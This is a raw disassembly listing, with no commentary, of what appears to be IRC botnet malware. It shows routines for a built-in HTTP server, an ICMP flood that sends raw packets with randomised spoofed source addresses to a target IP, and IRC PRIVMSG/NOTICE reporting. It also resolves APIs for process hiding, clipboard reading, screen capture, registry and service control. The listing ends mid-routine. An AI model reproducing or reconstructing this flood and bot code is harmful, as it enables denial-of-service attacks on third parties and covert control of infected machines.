lea eax, [ebp+var_28F0]
push eax
push esi
call dword_433414 ; recv
test eax, eax
jg short loc_403FF1
push esi
call dword_4335AC ; closesocket
xor eax, eax
cmp [ebp+var_128], eax
jbe loc_404198
loc_403FB5: ; CODE XREF: sub_403E06+1BF�j
cmp [ebp+eax*4+var_124], esi
jz short loc_403FDB
inc eax
cmp eax, [ebp+var_128]
jb short loc_403FB5
jmp loc_404198
; ---------------------------------------------------------------------------
loc_403FCC: ; CODE XREF: sub_403E06+1DE�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
inc eax
loc_403FDB: ; CODE XREF: sub_403E06+1B6�j
mov ecx, [ebp+var_128]
dec ecx
cmp eax, ecx
jb short loc_403FCC
dec [ebp+var_128]
jmp loc_404198
; ---------------------------------------------------------------------------
loc_403FF1: ; CODE XREF: sub_403E06+198�j
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_340]
rep stosd
lea eax, [ebp+var_28F0]
xor ebx, ebx
xor esi, esi
lea ecx, [eax+1]
loc_40400B: ; CODE XREF: sub_403E06+20A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40400B
sub eax, ecx
mov [ebp+var_C], eax
jz loc_404195
loc_40401D: ; CODE XREF: sub_403E06+2D0�j
mov al, [ebp+ebx+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_4040C0
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40409A
lea eax, [ebp+var_18F0]
lea edx, [eax+1]
loc_404054: ; CODE XREF: sub_403E06+253�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404054
sub eax, edx
cmp eax, 5
jbe short loc_40409A
mov eax, offset asc_41FA74 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_413920
pop ecx
pop ecx
push eax
call sub_413920
pop ecx
pop ecx
push eax
call sub_413859
pop ecx
pop ecx
lea edx, [ebp+var_340]
loc_40408E: ; CODE XREF: sub_403E06+290�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40408E
jmp short loc_4040AE
; ---------------------------------------------------------------------------
loc_40409A: ; CODE XREF: sub_403E06+243�j
; sub_403E06+25A�j
push 3
mov edi, offset asc_420620 ; "\r\n"
lea esi, [ebp+var_18F0]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_4040E1
loc_4040AE: ; CODE XREF: sub_403E06+292�j
xor eax, eax
mov ecx, 400h
lea edi, [ebp+var_18F0]
rep stosd
or esi, 0FFFFFFFFh
loc_4040C0: ; CODE XREF: sub_403E06+227�j
lea eax, [ebp+var_28F0]
inc ebx
inc esi
lea ecx, [eax+1]
loc_4040CB: ; CODE XREF: sub_403E06+2CA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4040CB
sub eax, ecx
cmp ebx, eax
jb loc_40401D
jmp loc_404195
; ---------------------------------------------------------------------------
loc_4040E1: ; CODE XREF: sub_403E06+2A6�j
mov ecx, [ebp+var_128]
xor eax, eax
test ecx, ecx
jbe short loc_404120
loc_4040ED: ; CODE XREF: sub_403E06+2F6�j
mov edx, [ebp+eax*4+var_124]
cmp edx, [ebp+arg_0]
jz short loc_404115
inc eax
cmp eax, ecx
jb short loc_4040ED
jmp short loc_404120
; ---------------------------------------------------------------------------
loc_404100: ; CODE XREF: sub_403E06+312�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ecx, [ebp+var_128]
inc eax
loc_404115: ; CODE XREF: sub_403E06+2F1�j
dec ecx
cmp eax, ecx
jb short loc_404100
dec [ebp+var_128]
loc_404120: ; CODE XREF: sub_403E06+2E5�j
; sub_403E06+2F8�j
lea eax, [ebp+var_340]
lea edx, [eax+1]
loc_404129: ; CODE XREF: sub_403E06+328�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404129
sub eax, edx
mov esi, eax
lea eax, [ebp+var_464]
lea ecx, [eax+1]
loc_40413D: ; CODE XREF: sub_403E06+33C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40413D
sub eax, ecx
add eax, esi
cmp eax, 104h
jnb short loc_40418C
and [ebp+var_C], 0
lea eax, [ebp+var_C]
push eax
push 8004667Eh
push [ebp+arg_0]
call dword_433444 ; ioctlsocket
push [ebp+var_358]
lea eax, [ebp+var_340]
push [ebp+var_34C]
push eax
lea eax, [ebp+var_464]
push eax
push [ebp+arg_0]
call sub_403B4C
add esp, 14h
jmp short loc_404195
; ---------------------------------------------------------------------------
loc_40418C: ; CODE XREF: sub_403E06+347�j
push [ebp+arg_0]
call dword_4335AC ; closesocket
loc_404195: ; CODE XREF: sub_403E06+211�j
; sub_403E06+2D6�j ...
mov ebx, [ebp+var_8]
loc_404198: ; CODE XREF: sub_403E06+FA�j
; sub_403E06+120�j ...
mov esi, [ebp+arg_0]
inc esi
cmp esi, [ebp+var_4]
mov [ebp+arg_0], esi
jbe loc_403EF0
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov eax, [ebp+var_4]
inc eax
loc_4041BB: ; CODE XREF: sub_403E06+E0�j
lea esi, [ebp+var_128]
lea edi, [ebp+var_23C]
push eax
rep movsd
call dword_433544 ; select
cmp eax, 0FFFFFFFFh
jnz loc_403EEB
loc_4041D9: ; CODE XREF: sub_403E06+66�j
; sub_403E06+8D�j ...
call dword_433558 ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset aHttpdErrorServ ; "[HTTPD]: Error: server failed, returned"...
push eax
call sub_412BB5
xor esi, esi
add esp, 0Ch
cmp [ebp+var_350], esi
jnz short loc_404221
push esi
push [ebp+var_354]
lea eax, [ebp+var_8F0]
push eax
lea eax, [ebp+var_6EC]
push eax
push [ebp+var_6F0]
call sub_4045DD
add esp, 14h
loc_404221: ; CODE XREF: sub_403E06+3F6�j
lea eax, [ebp+var_8F0]
push eax
call sub_401C33
pop ecx
push ebx
call dword_4335AC ; closesocket
push [ebp+var_358]
call sub_4111AE
pop ecx
push esi
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_403E06 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_404249 proc near ; DATA XREF: sub_4078FA+2A62�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
pop ecx
mov esi, eax
lea edi, [ebp+var_1BC]
rep movsd
push 0FFh
xor esi, esi
push 3
inc esi
push 2
mov [eax+19Ch], esi
call dword_4334A0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4042B0
call dword_433558 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSocke ; "[ICMP]: Error: socket() failed, returne"...
push eax
call sub_412BB5
add esp, 0Ch
xor esi, esi
loc_4042A2: ; CODE XREF: sub_404249+9C�j
; sub_404249+C3�j
cmp [ebp+var_24], esi
jnz loc_404504
jmp loc_4044E4
; ---------------------------------------------------------------------------
loc_4042B0: ; CODE XREF: sub_404249+3A�j
push 4
lea ecx, [ebp+var_C]
push ecx
mov [ebp+var_C], esi
push 2
xor esi, esi
push esi
push eax
call dword_4334BC ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_4042E7
call dword_433558 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSetso ; "[ICMP]: Error: setsockopt() failed, ret"...
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_4042A2
; ---------------------------------------------------------------------------
loc_4042E7: ; CODE XREF: sub_404249+7F�j
lea eax, [ebp+var_1B8]
push eax
call dword_433514 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_40430E
lea eax, [ebp+var_3BC]
push offset aIcmpInvalidTar ; "[ICMP]: Invalid target IP."
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_4042A2
; ---------------------------------------------------------------------------
loc_40430E: ; CODE XREF: sub_404249+AE�j
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
stosd
stosd
push esi
mov [ebp+var_1C], 2
call dword_4335EC ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_433514 ; inet_addr
mov ebx, ds:dword_41F004
mov [ebp+var_18], eax
mov [ebp+arg_0], esi
call ebx ; GetTickCount
mov [ebp+var_8], eax
call ebx ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_40449C
mov esi, 100h
loc_404362: ; CODE XREF: sub_404249+24B�j
push 41Ch
mov byte_432FF8, 45h
call dword_4335EC ; ntohs
mov word_432FFA, ax
xor eax, eax
cmp [ebp+var_2C], eax
mov word_432FFC, 1
mov word_432FFE, ax
mov byte_433000, 80h
mov byte_433001, 1
mov word_433002, ax
jz short loc_4043D1
call sub_412D71
mov edi, eax
shl edi, 8
call sub_412D71
add edi, eax
shl edi, 8
call sub_412D71
add edi, eax
shl edi, 8
call sub_412D71
add edi, eax
mov dword_433004, edi
jmp short loc_4043E9
; ---------------------------------------------------------------------------
loc_4043D1: ; CODE XREF: sub_404249+159�j
push [ebp+var_1BC]
call sub_406C33
pop ecx
push eax
call dword_433514 ; inet_addr
mov dword_433004, eax
loc_4043E9: ; CODE XREF: sub_404249+186�j
mov eax, [ebp+var_18]
mov dword_433008, eax
call sub_412D71
cdq
mov ecx, esi
idiv ecx
mov byte_43300C, dl
call sub_412D71
cdq
mov ecx, esi
idiv ecx
mov byte_43300D, dl
call sub_412D71
cdq
mov ecx, 0F0h
idiv ecx
and word_43300E, 0
mov word_433012, 1
inc edx
mov word_433010, dx
call sub_412D71
cdq
mov ecx, 0FFh
idiv ecx
push 10h
mov edi, offset dword_433014
mov al, dl
mov cl, al
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, esi
rep stosd
lea eax, [ebp+var_1C]
push eax
xor edi, edi
push edi
push 41Ch
push offset byte_432FF8
push [ebp+var_4]
call dword_433470 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_404521
inc [ebp+arg_0]
call ebx ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
jbe loc_404362
xor esi, esi
loc_40449C: ; CODE XREF: sub_404249+10E�j
push [ebp+var_4]
call dword_4335AC ; closesocket
mov eax, [ebp+arg_0]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpDoneWithSF ; "[ICMP]: Done with %s flood to IP: %s. S"...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ebp+var_24], esi
jnz short loc_404504
loc_4044E4: ; CODE XREF: sub_404249+62�j
push esi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_4045DD
add esp, 14h
loc_404504: ; CODE XREF: sub_404249+5C�j
; sub_404249+299�j
lea eax, [ebp+var_3BC]
push eax
call sub_401C33
push [ebp+var_38]
call sub_4111AE
pop ecx
pop ecx
push esi
loc_40451B: ; CODE XREF: sub_404249+347�j
call ds:dword_41F014 ; ExitThread
loc_404521: ; CODE XREF: sub_404249+231�j
push [ebp+var_4]
call dword_4335AC ; closesocket
call dword_433558 ; WSAGetLastError
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
push offset aIcmpErrorSendi ; "[ICMP]: Error sending packets to IP: %s"...
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_412E0D
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_404579
push edi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_4045DD
add esp, 14h
loc_404579: ; CODE XREF: sub_404249+30E�j
lea eax, [ebp+var_3BC]
push eax
call sub_401C33
push [ebp+var_38]
call sub_4111AE
pop ecx
pop ecx
push edi
jmp short loc_40451B
sub_404249 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404592 proc near ; CODE XREF: sub_40751F+40�p
; sub_4078FA+1BB�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push 200h
push eax
call sub_412E64
lea eax, [ebp+var_200]
add esp, 10h
lea edx, [eax+1]
loc_4045BF: ; CODE XREF: sub_404592+32�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4045BF
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_433534 ; send
leave
retn
sub_404592 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045DD proc near ; CODE XREF: sub_401000+B2�p
; sub_4010CA+61�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_4045F8
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_4045F8: ; CODE XREF: sub_4045DD+14�j
mov eax, edi
lea edx, [eax+1]
loc_4045FD: ; CODE XREF: sub_4045DD+25�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4045FD
sub eax, edx
mov esi, eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_40460E: ; CODE XREF: sub_4045DD+36�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40460E
push [ebp+arg_8]
sub eax, ecx
mov ecx, 1FAh
sub ecx, eax
push offset aS_1 ; "%s"
sub ecx, esi
push ecx
lea eax, [ebp+var_400]
push eax
call sub_412E0D
lea eax, [ebp+var_400]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push edi
push offset aSSS ; "%s %s :%s\r\n"
push eax
call sub_412BB5
add esp, 24h
lea eax, [ebp+var_200]
pop edi
lea ecx, [eax+1]
pop esi
loc_40465F: ; CODE XREF: sub_4045DD+87�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40465F
push 0
sub eax, ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_433534 ; send
cmp [ebp+arg_10], 0
jz short locret_40468C
push 0FAh
call ds:dword_41F000 ; Sleep
locret_40468C: ; CODE XREF: sub_4045DD+A2�j
leave
retn
sub_4045DD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40468E proc near ; CODE XREF: sub_40D1EF+4B�p
push ebx
push ebp
mov ebp, ds:dword_41F078
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, ds:dword_41F074
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4047AE
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_433478, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_433490, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_4334EC, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_433450, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_4334B8, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_43349C, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_43353C, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_43342C, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_4334C0, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_4334E4, eax
call esi ; GetProcAddress
cmp dword_433478, ebx
mov dword_433548, eax
jz short loc_40478C
cmp dword_433490, ebx
jz short loc_40478C
cmp dword_4334EC, ebx
jz short loc_40478C
cmp dword_433450, ebx
jz short loc_40478C
cmp dword_43349C, ebx
jz short loc_40478C
cmp dword_43353C, ebx
jz short loc_40478C
cmp dword_43342C, ebx
jz short loc_40478C
cmp dword_4334C0, ebx
jz short loc_40478C
cmp dword_4334E4, ebx
jz short loc_40478C
cmp eax, ebx
jnz short loc_404796
loc_40478C: ; CODE XREF: sub_40468E+B8�j
; sub_40468E+C0�j ...
mov dword_4335F0, 1
loc_404796: ; CODE XREF: sub_40468E+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_43359C, eax
jz short loc_4047C3
push 1
push ebx
call eax ; GetDiskFreeSpaceExA
jmp short loc_4047C3
; ---------------------------------------------------------------------------
loc_4047AE: ; CODE XREF: sub_40468E+1D�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_4335F4, eax
mov dword_4335F0, 1
loc_4047C3: ; CODE XREF: sub_40468E+117�j
; sub_40468E+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_41F070 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40487E
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_433560, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_4334F8, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_433434, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_433498, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_43344C, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_4335CC, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_433430, eax
call esi ; GetProcAddress
cmp dword_433560, ebx
mov dword_433538, eax
jz short loc_404889
cmp dword_4334F8, ebx
jz short loc_404889
cmp dword_433434, ebx
jz short loc_404889
cmp dword_433498, ebx
jz short loc_404889
cmp dword_43344C, ebx
jz short loc_404889
cmp dword_4335CC, ebx
jz short loc_404889
cmp dword_433430, ebx
jz short loc_404889
cmp eax, ebx
jnz short loc_404893
jmp short loc_404889
; ---------------------------------------------------------------------------
loc_40487E: ; CODE XREF: sub_40468E+144�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_4335FC, eax
loc_404889: ; CODE XREF: sub_40468E+1B8�j
; sub_40468E+1C0�j ...
mov dword_4335F8, 1
loc_404893: ; CODE XREF: sub_40468E+1EC�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_404A2E
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_4335C8, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_4334E8, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_433484, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_433460, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_4334DC, eax
call esi ; GetProcAddress
cmp dword_4335C8, ebx
mov dword_43357C, eax
jz short loc_40491E
cmp dword_4334E8, ebx
jz short loc_40491E
cmp dword_433484, ebx
jz short loc_40491E
cmp dword_433460, ebx
jz short loc_40491E
cmp dword_4334DC, ebx
jz short loc_40491E
cmp eax, ebx
jnz short loc_404928
loc_40491E: ; CODE XREF: sub_40468E+26A�j
; sub_40468E+272�j ...
mov dword_433600, 1
loc_404928: ; CODE XREF: sub_40468E+28E�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_4335D4, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_4335BC, eax
call esi ; GetProcAddress
cmp dword_4335D4, ebx
mov dword_433508, eax
jz short loc_404963
cmp dword_4335BC, ebx
jz short loc_404963
cmp eax, ebx
jnz short loc_40496D
loc_404963: ; CODE XREF: sub_40468E+2C7�j
; sub_40468E+2CF�j
mov dword_433600, 1
loc_40496D: ; CODE XREF: sub_40468E+2D3�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_43355C, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_4335D8, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_433564, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_433580, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_433494, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_4334D0, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_43356C, eax
call esi ; GetProcAddress
cmp dword_43355C, ebx
mov dword_433598, eax
jz short loc_404A11
cmp dword_4335D8, ebx
jz short loc_404A11
cmp dword_433564, ebx
jz short loc_404A11
cmp dword_433580, ebx
jz short loc_404A11
cmp dword_433494, ebx
jz short loc_404A11
cmp dword_4334D0, ebx
jz short loc_404A11
cmp dword_43356C, ebx
jz short loc_404A11
cmp eax, ebx
jnz short loc_404A1B
loc_404A11: ; CODE XREF: sub_40468E+34D�j
; sub_40468E+355�j ...
mov dword_433600, 1
loc_404A1B: ; CODE XREF: sub_40468E+381�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_433530, eax
jnz short loc_404A43
jmp short loc_404A39
; ---------------------------------------------------------------------------
loc_404A2E: ; CODE XREF: sub_40468E+210�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433604, eax
loc_404A39: ; CODE XREF: sub_40468E+39E�j
mov dword_433600, 1
loc_404A43: ; CODE XREF: sub_40468E+39C�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_404B0F
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_4335DC, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_4335B0, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_433518, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_433510, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_433554, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_43343C, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_433528, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_4334CC, eax
call esi ; GetProcAddress
cmp dword_4335DC, ebx
mov dword_43351C, eax
jz short loc_404B1A
cmp dword_4335B0, ebx
jz short loc_404B1A
cmp dword_433518, ebx
jz short loc_404B1A
cmp dword_433510, ebx
jz short loc_404B1A
cmp dword_433554, ebx
jz short loc_404B1A
cmp dword_43343C, ebx
jz short loc_404B1A
cmp dword_433528, ebx
jz short loc_404B1A
cmp dword_4334CC, ebx
jz short loc_404B1A
cmp eax, ebx
jnz short loc_404B24
jmp short loc_404B1A
; ---------------------------------------------------------------------------
loc_404B0F: ; CODE XREF: sub_40468E+3C0�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43360C, eax
loc_404B1A: ; CODE XREF: sub_40468E+441�j
; sub_40468E+449�j ...
mov dword_433608, 1
loc_404B24: ; CODE XREF: sub_40468E+47D�j
mov ebp, ds:dword_41F070
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_404DE0
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_4334B0, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_433424, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_43352C, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_4334F4, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_433574, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_433558, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_4335B8, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_4334A0, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_433444, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_433458, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_433520, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_433514, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_4335EC, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_4335C4, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_433594, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov dword_433570, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_433534, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_433470, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_433414, eax
call esi ; GetProcAddress
mov dword_433438, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_433578, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_433544, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_4335C0, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_433464, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_4334BC, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_433418, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_4335B4, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_433500, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_433590, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_4334E0, eax
call esi ; GetProcAddress
cmp dword_4334B0, ebx
mov dword_4335AC, eax
jz loc_404DEB
cmp dword_433424, ebx
jz loc_404DEB
cmp dword_43352C, ebx
jz loc_404DEB
cmp dword_433574, ebx
jz loc_404DEB
cmp dword_433558, ebx
jz loc_404DEB
cmp dword_4335B8, ebx
jz loc_404DEB
cmp dword_4334A0, ebx
jz loc_404DEB
cmp dword_433444, ebx
jz loc_404DEB
cmp dword_433458, ebx
jz loc_404DEB
cmp dword_433520, ebx
jz loc_404DEB
cmp dword_433514, ebx
jz loc_404DEB
cmp dword_4335EC, ebx
jz loc_404DEB
cmp dword_4335C4, ebx
jz loc_404DEB
cmp dword_433594, ebx
jz short loc_404DEB
cmp dword_433534, ebx
jz short loc_404DEB
cmp dword_433470, ebx
jz short loc_404DEB
cmp dword_433414, ebx
jz short loc_404DEB
cmp dword_433438, ebx
jz short loc_404DEB
cmp dword_433578, ebx
jz short loc_404DEB
cmp dword_433544, ebx
jz short loc_404DEB
cmp dword_4335C0, ebx
jz short loc_404DEB
cmp dword_433464, ebx
jz short loc_404DEB
cmp dword_4334BC, ebx
jz short loc_404DEB
cmp dword_433418, ebx
jz short loc_404DEB
cmp dword_4335B4, ebx
jz short loc_404DEB
cmp dword_433500, ebx
jz short loc_404DEB
cmp dword_433590, ebx
